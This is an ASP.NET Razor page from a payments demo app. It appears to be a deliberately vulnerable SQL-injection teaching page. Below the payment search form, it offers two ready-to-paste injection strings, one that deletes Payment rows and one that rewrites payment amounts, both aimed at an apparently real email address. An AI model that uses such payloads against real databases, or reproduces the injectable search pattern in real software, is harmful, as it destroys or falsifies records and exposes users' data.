@page
@model MoneyBankers.Pages.Payment.SQLInjectModel
@{
    ViewData["Title"] = "SQL Injection";
}
<h2>Index</h2>

<p>
    <a asp-page="Create">Create New</a>
</p>

@if (TempData["message"] != null)
{
    <p><font color="blue"><b>@TempData["message"]</b></font></p>
}

<form>
    <div class="form-group">
        Search by Name: <input asp-for="SearchString" size="60" />
        <input type="submit" value="Search" asp-page-handler="Test" />
        <p>
            <span asp-validation-for="SearchString" class="text-danger"></span>
        </p>
    </div>
</form>
<table class="table">
    <thead>
        <tr>
            <th>
                @Html.DisplayNameFor(model => model.Payments[0].Sender)
            </th>
            <th>
                @Html.DisplayNameFor(model => model.Payments[0].PaymentDate)
            </th>
            <th>
                @Html.DisplayNameFor(model => model.Payments[0].Receiver)
            </th>
            <th>
                @Html.DisplayNameFor(model => model.Payments[0].Amount)
            </th>
            <th></th>
        </tr>
    </thead>
    <tbody>
        @foreach (var item in Model.Payments)
        {
                <tr>
                    <td>
                        @Html.DisplayFor(modelItem => item.Sender)
                    </td>
                    <td>
                        @Html.DisplayFor(modelItem => item.PaymentDate)
                    </td>
                    <td>
                        @Html.DisplayFor(modelItem => item.Receiver)
                    </td>
                    <td>
                        @Html.DisplayFor(modelItem => item.Amount)
                    </td>
                    <td>
                        <a asp-page="./Details" asp-route-id="@item.ID">Details</a>
                    </td>
                </tr>
        }
    </tbody>
</table>

<hr />
<p>
<p>Inject the following code into the Search by Name Textbox:</p>
<p>
    First___   Example (replace jack with an existing name - ensure space after --):<font color="blue">
        <input type="text" name="first" value="%'; Delete from Payment where Sender='dashiniofficial16@gmail.com' -- " readonly size="60">
    </font>
</p>

<p>
    Second Example (replace jack with an existing name - ensure space after --):<font color="blue">
        <input type="text" name="first" value="%'; Update Payment SET Amount=100 where Name='dashiniofficial16@gmail.com' -- " readonly size="60">
    </font>

</p>

@section Scripts {
    @{await Html.RenderPartialAsync("_ValidationScriptsPartial");}
}
